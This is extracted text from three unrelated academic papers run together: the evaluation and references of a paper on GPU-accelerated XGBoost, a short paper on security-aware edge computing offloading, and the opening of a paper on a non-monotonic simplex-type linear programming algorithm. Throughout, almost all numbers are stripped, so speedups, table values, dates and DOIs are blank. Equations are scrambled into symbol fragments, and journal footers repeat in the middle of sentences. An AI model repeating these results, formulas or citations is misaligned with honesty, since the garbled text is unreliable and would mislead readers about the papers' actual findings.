https://archive.ics.uci.edu/ml/datasets/higgs. c https://www.kaggle.com/c/bosch-production-line-performance/data. table parameters. dataset objective eval_metric max_depth eta boosting iterations yltr rank:ndcg ndcg@ . higgs binary:logistic auc . bosch binary:logistic auc . mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / https://webscope.sandbox.yahoo.com/catalog.php?datatype=c https://archive.ics.uci.edu/ml/datasets/higgs https://www.kaggle.com/c/bosch-production-line-performance/data http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ roc curve) evaluation metric is appropriate. for the yltr dataset we use the rank:ndcg objective and ndcg@ evaluation metric to be consistent with the evaluation from chen & guestrin ( ). all other xgboost parameters are left as the default values. accuracy in table , we show the accuracy of the gpu algorithm compared to the cpu version. we test on configuration # so use a subset of the training set to fit the data within device memory but use the full test set for accuracy evaluation. there is only minor variation in accuracy between the two algorithms. both algorithms are equivalent for the higgs dataset, the cpu algorithm is marginally more accurate for the yltr dataset and the gpu algorithm is marginally more accurate on the bosch dataset. in table , we also show the accuracy without using the interleaved version of the gpu algorithm. variations in accuracy are attributable to the interleaved version of the algorithm not choosing splits at the halfway point between two training examples, instead choosing the split value as the right most training example minus some constant. differences also occur due to floating point precision as discussed in ‘floating point precision.’ speed tables and show the relative speedup of the gpu algorithm compared to the cpu algorithm over boosting iterations. for configuration # with lower end desktop hardware, speed ups of between . � and . � are achieved. on configuration # with higher end desktop hardware but the same number of cores, speed ups of between . � and . � are achieved. the gtx used in configuration # must sample the datasets as they do not fit entirely in device memory. the titan x used in configuration # is able to fit all three datasets entirely into memory. figure shows the performance of the gpu algorithm across varying problem sizes using configuration # . the experiment is performed on subsets of the bosch dataset using boosting iterations. the gpu algorithm’s time increases linearly with respect to the number of input rows. it is approximately equal to the cpu algorithm at , table accuracy benchmarks. dataset subset metric cpu accuracy gpu accuracy yltr . ndcg@ . . higgs . auc . . bosch . auc . . table accuracy benchmarks—sorting version only. dataset subset metric gpu accuracy (sorting version only) yltr . ndcg@ . higgs . auc . bosch . auc . mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rows and always faster thereafter for this dataset. this gives an idea of the minimum batch size at which the gpu algorithm begins to be effective. in fig. , we show the performance of the titan x from configuration # against configuration # (a high-end core server) on the yahoo dataset with boosting iterations and varying numbers of threads. each data point shows the average time of eight runs. error bars are too small to be visible at this scale. the titan x outperforms the core machine by approximately . �, even if the number of threads for the core machine is chosen optimally. interleaved algorithm performance in table and fig. , we show the effect of changing the threshold at which the algorithm switches between the interleaved version of the algorithm and the sorting version of the algorithm. timings are from boosting iterations on a % subset of the bosch dataset using configuration # . using the interleaved version of the algorithm shows benefits all the way up to the fifth level with a . � speed increase as compared to just using the sorting algorithm. after this depth temporary storage is insufficient to keep table configuration # speed benchmarks. dataset subset cpu time (s) gpu time (s) speedup yltr . , . higgs . , , . bosch . , . table configuration # speed benchmarks. dataset subset cpu time (s) gpu time (s) speedup yltr . . higgs . , , . bosch . , . figure bosch: time vs problem size. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ using the interleaved approach. note that for the first level the interleaved algorithm and the sorting algorithm are equivalent as there is only one node bucket. surprisingly the interleaved algorithm is still faster than the sorting algorithm at level despite the fact that the multiscan and multireduce operations must sequentially iterate over = nodes at each step. this shows that executing instructions on elements figure yahoo ltr: n-threads vs time. table bosch dataset: interleaved levels. levels gpu time (s) accuracy speedup . . . . . . . . . . . . . . . . . . figure bosch: interleaved algorithm threshold. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ held in registers or shared memory carries a very low cost relative to uncoalesced re-ordering of elements in device memory, as is performed when radix sorting. memory consumption we show the device memory consumption in table for all three benchmark datasets. each dataset can be fit entirely within the gb device memory of a titan x card. in table , we show the memory consumption of the original cpu algorithm for comparison. host memory consumption was evaluated using the valgrind massif (http://valgrind.org/docs/manual/msmanual.html) heap profiler tool. device memory usage was recorded programmatically using custom memory allocators. the device memory requirements are approximately twice that of the original cpu algorithm. this is because the cpu algorithm is able to process data in place, whereas the gpu algorithm requires sorting functions that are not in place and must maintain separate buffers for input and output. conclusion a highly practical gpu-accelerated tree construction algorithm is devised and evaluated within the xgboost library. the algorithm is built on top of efficient parallel primitives and switches between two modes of operation depending on tree depth. the ‘interleaved’ mode of operation shows that multiscan and multireduce operations with a limited number of buckets can be used to avoid expensive sorting operations at tree depths below six, resulting in speed increases of . � for the gpu implementation. the gpu algorithm provides speedups of between � and � over multicore cpus on desktop machines and a speed up of . � over � xeon cpus with cores. we see significant speedups for all parameters and datasets above a certain size, while providing an algorithm that is feature complete and able to handle sparse data. potential drawbacks of the algorithm are that the entire input matrix must fit in device memory and device memory consumption is approximately twice that of the host memory used by the cpu algorithm. despite this, we show that the algorithm is memory efficient enough to process the entire higgs dataset containing million instances and features on a single gb card. table memory: gpu algorithm. dataset device memory (gb) yltr . higgs . bosch . table memory: cpu algorithm. dataset host memory (gb) yltr . higgs . bosch . mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://valgrind.org/docs/manual/msmanual.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ our algorithm provides a practical means for xgboost users processing large data sets to significantly reduce processing times, showing that gradient boosting tasks are a good candidate for gpu-acceleration and are therefore no longer solely the domain of multicore cpus. additional information and declarations funding this research was supported by a marsden grant from the royal society of new zealand (uow ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: marsden grant from the royal society of new zealand: uow . competing interests eibe frank is an academic editor for peerj. author contributions � rory mitchell conceived and designed the experiments, performed the experiments, analysed the data, wrote the paper, prepared figures and/or tables, performed the computation work and reviewed drafts of the paper. � eibe frank conceived and designed the experiments, wrote the paper and reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github: https://github.com/dmlc/xgboost/tree/master/plugin/updater_gpu references baxter s. . modern gpu—performance. available at https://moderngpu.github.io/ performance.html (accessed june ). blelloch ge. . prefix sums and their applications. technical report cmu-cs- - , school of computer science, carnegie mellon university. chen t, guestrin c. . xgboost: a scalable tree boosting system. in: proceedings of the nd acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . chiu c-c, luo g-h, yuan s-m. . a decision tree using cuda gpus. in: proceedings of the th international conference on information integration and web-based applications and services. new york: acm, – . coates a, huval b, wang t, wu d, catanzaro b, andrew n. . deep learning with cots hpc systems. in: proceedings of the th international conference on machine learning, jmlr.org, – . mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/dmlc/xgboost/tree/master/plugin/updater_gpu https://moderngpu.github.io/performance.html https://moderngpu.github.io/performance.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ eilers m. . multireduce and multiscan on modern gpus. master’s thesis, department of computer science, university of copenhagen. friedman j, hastie t, tibshirani r. . the elements of statistical learning. in: springer series in statistics. vol. . berlin: springer, – . grahn h, lavesson n, lapajne mh, slat d. . cudarf: a cuda-based implementation of random forests. in: proceedings of the th ieee/acs international conference on computer systems and applications, ieee computer society, – . hall m, frank e, holmes g, pfahringer b, reutemann p, witten ih. . the weka data mining software: an update. acm sigkdd explorations newsletter ( ): – doi . / . . harris m. . optimizing parallel reduction in cuda. available at http://developer.download. nvidia.com/assets/cuda/files/reduction.pdf (accessed march ). harris m. . how to access global memory efficiently in cuda c/c++ kernels. available at http://devblogs.nvidia.com/parallelforall/how-access-global-memory-efficiently-cuda-c-kernels/ (accessed november ). harris m, sengupta s, owens jd. . parallel prefix sum (scan) with cuda. gpu gems ( ): – . higham nj. . the accuracy of floating point summation. siam journal on scientific computing ( ): – doi . / . hillis wd, steele gl jr. . data parallel algorithms. communications of the acm ( ): – doi . / - - - - _ . hoberock j, bell n. . thrust: a parallel template library. available at https://thrust.github.io/. lo w-t, chang y-s, sheu r-k, chiu c-c, yuan s-m. . cudt: a cuda based decision tree algorithm. scientific world journal : – doi . / / . matloff n. . programming on parallel machines. available at http://heather.cs.ucdavis.edu/ ~matloff/ /pln/parprocbook.pdf. merrill d, grimshaw a. . high performance and scalable radix sorting: a case study of implementing dynamic parallelism for gpu computing. parallel processing letters ( ): – doi . /s . merrill d, nvidia-labs. . cuda unbound (cub) library. available at http://nvlabs.github. io/cub/. nasridinov a, lee y, park y-h. . decision tree construction on gpu: ubiquitous parallel computing approach. computing ( ): – doi . /s - - -z. nvidia. . block scan algorithms. available at http://nvlabs.github.io/cub/namespacecub. html#abec bba c e e d d ab (accessed december ). nvidia. . cuda c programming guide. available at http://docs.nvidia.com/cuda/index.html. quinlan jr. . c . : programs for machine learning. san francisco: elsevier. sharp t. . implementing decision trees and forests on a gpu. in: proceedings of the th european conference on computer vision. berlin: springer, – . strnad d, nerat a. . parallel construction of classification trees on a gpu. concurrency and computation: practice and experience ( ): – doi . /cpe. . mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / . http://developer.download.nvidia.com/assets/cuda/files/reduction.pdf http://developer.download.nvidia.com/assets/cuda/files/reduction.pdf http://devblogs.nvidia.com/parallelforall/how-access-global-memory-efficiently-cuda-c-kernels/ http://dx.doi.org/ . / http://dx.doi.org/ . / - - - - _ https://thrust.github.io/ http://dx.doi.org/ . / / http://heather.cs.ucdavis.edu/~matloff/ /pln/parprocbook.pdf http://heather.cs.ucdavis.edu/~matloff/ /pln/parprocbook.pdf http://dx.doi.org/ . /s http://nvlabs.github.io/cub/ http://nvlabs.github.io/cub/ http://dx.doi.org/ . /s - - -z http://nvlabs.github.io/cub/namespacecub.html#abec bba c e e d d ab http://nvlabs.github.io/cub/namespacecub.html#abec bba c e e d d ab http://docs.nvidia.com/cuda/index.html http://dx.doi.org/ . /cpe. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ accelerating the xgboost algorithm using gpu computing introduction background and related work parallel tree construction evaluation conclusion references international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - a study of edge computing offloading based on security luo pei school of computer science and engineering xi'an technological university xi'an, , china e-mail: @qq.com lei juchao school of computer science and engineering xi'an technological university xi'an, , china e-mail: @qq.com abstract—with the widespread use of iot scenario and the development of mobile network technology, the access to many devices at the edge of the network has generated an exponential increase in the volume of data, bringing higher than ever before the demand for data transmission bandwidth, traditional centralized cloud computing can no longer meet the demand, the need to adopt edge computing distributed collaborative approach to data processing. in this paper, we study a mobile edge computing model based on energy consumption optimization management under a certain delay constraint, focus on an edge computing offload scheme based on security management, and design an offload decision scheme based on a multi-objective optimization hybrid quantum evolution algorithm (mhqea) to ensure the security of user equipments during computing offload in the edge network and reduce total system energy consumption. keywords-edge computing; computing offloading; resource allocation i. introduction in recent years, with the rapid emergence of compute-intensive applications such as high-definition video, augmented reality/virtual reality, internet of things, internet of vehicles, and industrial internet, people have put forward higher demands on the transmission rate and service quality of the network, resulting in an explosive growth in network traffic. at the same time, mobile devices are gradually emerging, due to the increasingly powerful design features, mobile devices have limited computing power, poor real-time and energy consumption limitations, it is difficult to bear the needs of computation-intensive, latency-sensitive and high energy consumption applications, in order to meet these challenges, the first solution proposed is to apply compute offload technology in mobile cloud computing (mobile cloud computing (mcc)) architecture. by offloading the compute tasks of the terminal to a cloud data center with sufficient compute and storage resources, the delay and power consumption problems caused by the lack of computing power of the smart terminal can be alleviated to some extent. in order to solve the latency problem of mcc, researchers have focused on mobile edge computing, which is a core technology of g in [ ], it was proposed by the european telecommunications standardization institute (etsi) to provide computing, communication and storage capabilities closer to users by sinking cloud data centers to the wireless network edge. in mobile edge computing (mec) systems, network edge devices such as base stations, access points and routers are given cloud-like computing and storage capabilities to serve users as an alternative to the cloud. at the same time, because it is placed close to mobile device terminals and data sources, it can significantly reduce mobile device load and reduce transmission latency. among them, compute offloading, as a cutting-edge technology for edge computing, can be achieved by offloading compute tasks to a well- resourced edge cloud. the problem of computational offloading is mainly focused on offloading decisions and resource allocation, and many scholars have done relevant research on these issues. in the literature[ ], a one-dimensional search algorithm is used to minimize the latency target and optimize the user task execution latency based on the application queue buffer queue state. experimental results show that the optimal strategy proposed in this scheme can reduce the latency by up to % compared to the local execution strategy and up to % compared to the cloud execution strategy, which can effectively respond to the dynamic arrival of intensive applications; the user device in the literature[ ] adopts energy harvesting technique to optimize the energy consumption of the execution task, and proposes that the dynamic optimization algorithm can reduce the execution time by up to % by offloading the task to the mec, while preventing the offloader from being dropped. the shortcomings of both papers are that they do not consider the energy mailto:yangyh @qq.com mailto:yangyh @qq.com international journal of advanced network, monitoring and controls volume , no. , consumption of the user device, in the literature[ ], it is assumed that the user device utilizes energy harvesting techniques and the energy consumption of the user device is ignored in the decision making process, energy harvesting techniques do not completely solve the energy consumption problem. the literature[ ] investigates offload decisions during single node computation, the goal of which is not only to minimize execution latency but also to minimize the power consumption of edge computation, considering dense user devices capable of accessing multiple edge servers through nearby small nodes, and then proposes an optimal solution using an equivalent discrete framework, however, as the number of edge servers increases, this approach leads to high communication overhead and high computational complexity. therefore, the authors solve this problem through an application assignment indexing scheme, which broadcasts through the node's own indexing policy and selects the most appropriate edge server to minimize execution latency and energy consumption, the downside of this scheme is that it does not consider scenarios with multiple compute nodes. the literature[ ] considers the problem of joint optimization of energy consumption and latency of devices in a multi-user, multi-channel environment, where devices can optimize performance by adjusting the weighting parameters, however, this literature assumes that the computational resources of the mec are sufficient, and the problem of insufficient edge computing resources exists in realistic production environments with multi- user conditions. however, the above literature does not consider the impact of security issues on system performance. security issues such as privacy breaches may be encountered during the offloading process, so security issues are equally important in the study of edge computing offloading. unlike the aforementioned literature, this paper designs a secure computational offloading method, the main contents of which are as follows: considering the impact of time delay and energy consumption on the system, the resource allocation in the task transfer process and the offloading decision in the task processing process are jointly optimized to achieve the cost optimization of mobile devices, and security is added on top of this. the specific work is as follows: ) design the mec network architecture and ensure security. ) considering minimum energy consumption under time constraints and joint optimization to improve qoe. ) an offloading decision solving method based on the multi-objective optimization hybrid quantum evolution algorithm (mhqea) is proposed. ) through simulation and comparison with conventional algorithms, it is proved that the energy saving cost proposed in this paper is lower, the total energy consumption of the system is lower, and the safety of the system is guaranteed. ii. security-based mec calculation offloading scheme the compute offload technology offloads the compute tasks of the user terminal to the cloud service, solving the bottleneck in compute performance, resource storage, etc. of the user terminal. computing offload technology was first proposed in the cloud, and the emergence of mec has provided a new direction for the development of computing offload technology. performing computational offload tasks in mec not only solves the problem of high network resource utilization, but also solves the problem of latency. therefore, the convergence of emc and compute offload is an important direction for network development in the future. in mobile edge computing, the edge cloud needs to process tasks from a variety of mobile terminals in real time, and needs to coordinate the distribution of edge server resources and task loads to meet the heterogeneous requirements of different tasks for processing delay, execution energy consumption and reliability. offload decision and resource allocation will directly affect the performance of computing offload in mobile edge computing, which has great research significance. a. security-based system model design although edge computing networks reduce request latency and core network pressure and improve network performance, but some problems in network security have been exposed, especially its distributed deployment mode leads to network security reduction, making dos attacks easier, therefore, how to ensure the security of edge computing becomes one of the problems facing edge computing networks. the system establishes a model of multi-user multi-edge computing services in a wireless network. it is assumed that each edge server has complete control over the channel gain, local calculation energy, and input data size of all end users. in daily life, the number of users is greater than the number of base stations set in the edge cloud. we assume that the mec system international journal of advanced network, monitoring and controls volume , no. , consists of m mobile users and n base stations that can be connected to the edge cloud. mobile core network security testing (routing control) resource allocation offloading decision wireless access network smart terminal mobile edge computing figure . security-based mobile edge computing network architecture b. design of unloading scheme for edge computing based on security the computational offloading technique in edge computing involves the offloading decision and resource allocation, etc. the offloading decision is optimized for the performance of different services, and in this paper, the offloading decision is carried out with minimum energy consumption under the delay constraint, and the resource allocation is considered after the decision is offloaded. ) network model we use c={c ,c ,... ,cn} to represent the different edge nodes, and the mec set of each edge node is represented as m={m ,m ,... .mp}, which provides computational offload for mobile terminals, and the ue set is denoted as n={n ,n ,... .nq}. ) offload decision model the offload decision model, as the core issue of computational offload techniques, is largely dependent on the computational task through the computing power of the device itself and the time delay and energy consumption that results when the offloading is completed to the edge. therefore, it is necessary to calculate and analyze the delay and energy consumed by local computing and edge computing to complete the computing task. the unloading decisions within each time slot are expressed in matrix form, i.e., the unloading decision matrix is represented by a, as in ( ).             mnn m aa aa a , , ... ......... ...  ( ) where, ∈ { , } denotes whether device n offloads the task to the edge server, = denotes local execution, and anyway denotes the task is offloaded to the edge server. each edge server can only handle one task at a time. thus the constraints are as in ( ).  a ,   n n mn  a ,   m m mn  ( ) ) local execution local execution means that user hands over task t to the mobile device for direct execution and the local execution of the task consumes mainly computational delay, as in ( ).  l n nl i i i f c t  n  ( ) where represents the cpu required to complete the task and represents the computing power of user n's mobile device. the energy consumption for the local execution of task t is mainly the energy consumption for processing computational tasks, as in ( ).  iii n l ce  nn   ( ) in the formula, indicates the energy consumption factor of the mobile device. according to formula ( ) and formula ( ), the locally executed valuation function is obtained as in ( ).  l n el n l n l iiiii etd nn      , , ,..  e n l n e n l n iiii ts    ( ) in the formula, used as the weight of the local execution time and energy consumption of the mn a , mn a , in c l ni f in  e n l n ii  , international journal of advanced network, monitoring and controls volume , no. , task, respectively, in order to determine the energy consumption of each user. ) mec server implementation the execution mode of the mec server refers to that the user n migrates the task t to a virtual machine on the mec server through a wireless channel for execution, and allocates computing and communication resources to the user equipment through the trust detection server. the delay of the entire calculation task is mainly transmission delay and calculation delay, as in ( ).  f h r b t i c i ii n   ( ) the data volume of the calculation result is much lower than the data input volume, so the transmission consumption of the calculation result is ignored. the energy consumption of the task t server mainly includes transmission energy consumption, mec server calculation energy consumption and server monitoring energy consumption, as in ( ).  monitor i n c n eh r b pe ii  i i   ( ) according to formula ( ) and formula ( ), the locally executed valuation function is obtained as ( ):    cn c n c n cc n iiii etd   ni  ( ) ) security inspection introduce a security module in the mec server to perform security checks on the offloading process. because the routing module is responsible for the traffic, and because edge nodes have limited capacity compared to cloud computing centers, they are vulnerable to traffic attacks, and although individual edge nodes are compromised and nearby networks quickly find replaceable nodes to adjust to, a malicious attack can bring down a server. therefore, traffic forwarding is divided into traffic types and firewalls are set up between the center and branches to enhance ddos protection. it also detects virtual machine operation in real time to prevent malicious virtual machine migration behavior. the security detection module mainly detects the offloaded computational tasks through entropy detection algorithm, which can detect anomalies sensitive to the information entropy of changes in network parameters and ue parameters. in the case of potentially malicious offloads, the mec controller transfers them to the security monitoring server, updates their trust values, labels them as trust violations, and verifies the user's access to the network through a combination of trust violation values and information entropy, increasing detection accuracy and reducing system overhead by unifying the monitoring of potentially malicious users. if there is any error in security detection, the defense policy module will continue to secure the network through reallocation of resources or security transfer. the entropy detection algorithm can accurately sense changes in network parameters and calculate the corresponding information entropy to detect whether a user is maliciously unloading. energy is consumed during the detection of offloading computational tasks, aiming at the minimum energy consumption under time constraints and based on a safe offloading scheme, where the attributes involved in the entropy detection algorithm are user trust, offloading frequency, network environment, cpu and memory utilization, etc. the distribution of the property z in g belongs to a polynomial distribution, and the probability equation is as in ( ).  z || || z z ! || )( g z g gp g zg       ( ) where, the set of attributes g={g ,g , ... ,g }( ≤ z ≤ ), a represents the proportion of users with attribute to the entire system users, can be calculated, we use the maximum threshold method to determine if there is an abnormal packet unloading, if it is greater than the set threshold, then it is a malicious unloading task, unloading is not allowed during the unloading decision. the entropy detection algorithm is as in ( ).     ,,n )log( i inin rrr  ( ) where is the detection threshold and unloading is determined by the detection result, as in ( ). z g  gin pr , h r n international journal of advanced network, monitoring and controls volume , no. ,        h n h nn n rr rr n , ,   ( ) detection of controlled energy consumption as in ( ).  c nn m rm e  monitor  ( ) represents the server's monitored energy consumption, represents the memory resources provided by the mec server for one user device, and represents the resources available for the entire server. the overall optimization function is expressed as in ( ):      ]- [min n c nn   n c c nn l ii ee           nn ccnn h n h nn n ff rr rr ts , n , , ..      ( ) in the constraint condition, f represents the total cpu computing resources of the mec server. the computing resources allocated by the mec cannot exceed the total computing resources. iii. algorithm designs in the security-based computing offload scenario, the problem is an np-hard problem because of the large data volume. to further solve this problem, this paper adopts a solution of mhqea to find an optimal approximation of the model, and the process of finding an optimal approximation is represented as algorithm . iv. simulation performance evaluation set the system time gap length to ms, calculate the local calculation energy consumption and unloading energy consumption by the total number of system user equipments , , , , , , respectively, and repeat each set of calculation times to take the average. as shown in figure . algorithm : a computational offloading algorithm based on mhqea begin the current iteration number t = , and the maximum iteration number is set to m initialize the offload decision matrix an(t) find the optimal solution matrix pn(t) by observing the state of an(t) through the make subroutine correction of pn(t) by reparation subroutine evaluate the total energy consumption of the system and find the optimal solution b(t) while(t<m)do begin number of current iterations t plus an(t- ) is observed by the make subalgorithm to determine the pn(t) evaluate pn(t) for the minimum total system energy consumption updating an(t) through the update subroutine find the optimal solution in pn(t) and b(t- ) to b if(current number of iterations meets migration conditions)then migration b to b(t) end if end end figure . relationship between offloading delay and total number of user equipments in different ways as can be seen from figure , the system energy consumption is higher for all local execution and all server execution, and the energy consumption is slightly higher for a security-based offload decision scheme than for an optimized energy-based offload monitor e n m c m e n e r g y c o n s u m p t i o n / j total number of user equipments all local implementation all server execution security-based computing offload computational offload with optimization as the goal international journal of advanced network, monitoring and controls volume , no. , scheme. because of the energy consumption required for security testing, it improves the overall security of the system and ensures the quality of service for the user's device unloading. the optimal energy-based delay and security- based delay are calculated using the total number of user equipments in the system , , , , and , respectively, and the average of each group is repeated times. as shown in figure . figure . relationship between different ways of offloading energy consumption and total number of user equipments as can be seen from figure , a security-based offloading decision scheme is better than an energy- optimized offloading scheme. v. conclusion in the article, an offloading scheme for edge computing under security is proposed, which minimizes the total overhead of the system and improves the security of the offloading process, and we use an mhqea-based algorithm to find the optimal offloading decision matrix. the simulation results show that the total system overhead for this option is lower than for other options, while maintaining safety. because mec servers are small data centers, each server has far less energy than a cloud data center. with the development of the industrial internet, mec servers will be heavily deployed, which will cause the overall energy consumption of the system, how to deal with the greater energy consumption is also something we should study in the future. references [ ] xie renchao, huang tao, yang fan, liu yunjie. principles and practice of edge computing [m]. beijing: people's publishing house, . - [ ] taleb t, samdanis k, mada b , et al. on multi-access edge computing: a survey of the emerging g network edge cloud architecture and orchestration[j]. communications surveys & tutorials, ieee, , ( ): - . [ ] liu j, mao y, zhang j, et al. delay-optimal computation task scheduling for mobile-edge computing systems[j]. . [ ] mao y, zhang j, letaief k b. dynamic computation offloading for mobile-edge computing with energy harvesting devices[j]. ieee journal on selected areas in communications, : - . [ ] guo x, singh r, zhao t, et al. an index based task assignment policy for achieving optimal power-delay tradeoff in edge cloud systems[c]//icc - ieee international conference on communications. ieee, . [ ] chen x, jiao l, li w, et al. efficient multi-user computation offloading for mobile-edge cloud computing[j].ieee/acm transactions on networking, : - . [ ] chen yanbing, li juan, zhang qi. exploration of quantum evolution algorithms for solving constrained multi-objective optimization problems[j]. electronic technology and software engineering, , ( ):p. - , . d e l a y / m s total number of user equipments security-based offload delay offload delay based on optimized energy consumption submitted december accepted february published march corresponding author charalampos p. tri- antafyllidis, charalam- pos.triantafyllidis@oncology.ox.ac.uk academic editor sándor szénási additional information and declarations can be found on page doi . /peerj-cs. copyright triantafyllidis and samaras distributed under creative commons cc-by . open access a new non-monotonic infeasible simplex- type algorithm for linear programming charalampos p. triantafyllidis and nikolaos samaras computational biology & integrative genomics, department of oncology, medical sciences division, university of oxford, oxford, united kingdom department of applied informatics, school of information sciences, university of macedonia, thessaloniki, greece abstract this paper presents a new simplex-type algorithm for linear programming with the following two main characteristics: (i) the algorithm computes basic solutions which are neither primal or dual feasible, nor monotonically improving and (ii) the sequence of these basic solutions is connected with a sequence of monotonically improving interior points to construct a feasible direction at each iteration. we compare the proposed algorithm with the state-of-the-art commercial cplex and gurobi primal-simplex optimizers on a collection of well known benchmarks. the results are promising, showing that the new algorithm competes versus the state-of-the-art solvers in the total number of iterations required to converge. subjects algorithms and analysis of algorithms, optimization theory and computation keywords linear programming, simplex-type, interior point method, exterior point, non-monotonic, infeasible, mathematical programming, optimization introduction linear programming (lp) constitutes one of the most fundamental classes of mathematical programming models which is widely used in many scientific areas since many real world problems can be formulated as linear programs (lps) (triantafyllidis & papageorgiou, ; gkioulekas & papageorgiou, ; yang et al., ; amin & emrouznejad, ; janssens & ramaekers, ; fernndez & borrajo, ; burdett et al., ). lp is an important tool nowadays in many applications, spanning across a broad spectrum of fields (bertsimas & tsitsiklis, ). many algorithms have been invented for the solution of lps. the majority of these algorithms can be divided into two main categories: (i) simplex-type or pivoting algorithms and (ii) interior point methods (ipms). the primal simplex algorithm (psa) (dantzig, ) had been the most efficient method for solving lps until the ’s. psa ranked as one of the top algorithms of the th century (dongarra & sullivan, ). it performs well in practice, particularly on lps of small or medium size. nevertheless, psa is not polynomial. its worst-case complexity is exponential (klee & minty, ). simplex algorithm visits in a sequential manner adjacent vertices of the feasible region using pivot operations, so that the new vertex has better objective value (monotonic algorithm) compared to the previous one. it is well known that the behavior of this algorithmic family can be improved by modifying: (i) the initial solution and (ii) the pivoting rule. the selection of appropriate pivoting how to cite this article triantafyllidis cp, samaras n. . a new non-monotonic infeasible simplex-type algorithm for linear pro- gramming. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:charalampos.triantafyllidis@oncology.ox.ac.uk mailto:charalampos.triantafyllidis@oncology.ox.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. rules affects the number of iterations required for solving lps. different pivoting strategies yield different basis sequences in simplex-type algorithms. the flexibility of the entering and leaving variable selection allows to develop various pivoting schemes. a complete presentation can be found in terlaky & zhang ( ). the first polynomial time algorithm for linear programming was the russian (ellipsoid) algorithm, developed by khachiyan ( ). however, the ellipsoid algorithm is impractical for lp. karmarkar ( ) then invented the first interior point method (ipm); it uses a sequence of interior points and converges to the optimal solution in a few number of iterations. the most important advantage of ipms compared to psa is that the number of iterations is not proportional or related in any manner to the number of vertices. most of the ipms are infeasible in nature (mehrotra, ; mehrotra, ) and it is broadly accepted that an infeasible primal-dual ipm is the most efficient algorithm of this family. the development of ipms has revolutionized the field of mathematical programming and efficient ipms outperform the psa on large-scale lps. despite this fact, lps have continued to receive great scientific analysis lately. more and effective pivoting schemes appeared in the literature (terlaky, ; murty & fathi, ; arsham, ; pan, ; jurik, ; yeh & corley, ; elhallaoui et al., ; li, ). additionally, the papers (basu, loera & junod, ; gleixner, steffy & wolter, ; omer et al., ) proposed a framework for an improved primal simplex algorithm that guarantees an improvement in the objective value after each iteration. also, during the last decades researchers proposed more efficient implementations of simplex-type algorithms. the exterior point simplex algorithm (epsa) was originally developed by paparrizos ( ) for the assignment problem. epsa can avoid the boundary of the polyhedron of the feasible region and constructs two paths to converge to the optimal solution. one path is exterior to the feasible region while the other one is feasible. later on, paparrizos ( ) generalized epsa to lp. the key idea behind epsa is that when using pivots based on feasible directions to select the pair of entering and leaving variables, the algorithm can converge faster to the optimal solution. paparrizos, samaras & tsiplidis ( ) have demonstrated that the geometry of epsa reveals that this algorithm is faster than psa. this result was partially verified by preliminary computational results (paparrizos, samaras & stephanides, a; paparrizos, samaras & triantafyllidis, ). a well established way to improve epsa is to transform its exterior path into a dual feasible simplex path. such an algorithm is called primal-dual exterior point simplex algorithm (pdepsa) (paparrizos, ). this algorithm requires an initial dual feasible basic solution. since such a solution is not always readily available, a modified big-m method is applied. variations of using a two-phase approach for the epsa were presented in triantafyllidis & samaras ( ). the main advantage of pdepsa is its promising computational performance. an important improvement of the pdepsa is to traverse across the interior of the feasible region, in an attempt to avoid degenerate vertices of vertex-following algorithms. this algorithm is called primal-dual interior point simplex algorithm (pdipsa) (samaras, ). pdipsa can be seen as a separate procedure to move from any interior point to an optimal basic solution. it can be combined with ipms in order to develop a hybrid algorithm consisting of two stages (glavelis, ploskas & samaras, ). at first stage, an triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ipm is applied and at the second stage pdipsa is applied to compute an optimal basic solution. the main advantage of this hybrid algorithm is that it exploits the strengths of both ipm and pdipsa. the computational results are very encouraging. a complete review of exterior point algorithms can be found in paparrizos, samaras & sifaleras ( ). a review paper summarizing the advantages and disadvantages of pivots, ellipsoid and ipms was presented by illes & terlaky ( ). several methods have been developed which provide a combination of ipms with pivoting algorithms (bixby et al., ; bixby & saltzman, ; andersen & ye, ; pan, ). all the above mentioned algorithms are monotonic in nature. a monotonic linear optimization algorithm starts with a (feasible or infeasible) vertex, moves between (adjacent or not) vertices, improving the value of the objective function until an optimal solution is found. in this paper a non-monotonic infeasible simplex-type algorithm for general lp is presented. the proposed method does not maintain monotonicity on the basic solutions, but only on the interior point which is used to construct the feasible direction at each iteration. this new algorithm is comprised of three different parts: (i) interior exterior primal simplex algorithm (iepsa), (ii) exterior point simplex algorithm (epsa) and (iii) primal-dual interior point simplex algorithm (pdipsa). the first one (iepsa) interconnects a primal interior point with a primal (infeasible) exterior one. using these two points, a feasible direction is constructed and while iterating in a non-monotonic way the algorithm stops at either a primal or a dual feasible solution. on the other hand iepsa improves strictly from iteration to iteration the objective value at the interior point. the exterior point reaches optimality independently of the monotonicity of the interior point. in conclusion, we have non-monotonic movement outside the feasible region and monotonic movement in the interior of the feasible region. in order to gain insight into the practical behavior of the proposed algorithm, we have performed some computational experiments on a set of benchmark problems (netlib, kennington, mészáros). the computational results demonstrate that the proposed non- monotonic algorithm requires less iterations than both the primal-simplex algorithm implemented in cplex and gurobi commercial solvers. this paper is organized as follows: in ‘materials & methods’ a brief reference to some basic notation for the linear problem and the algorithms described in this paper is given. subsection iepsa presents the proposed algorithm, an illustrative example and its pseudo- code. 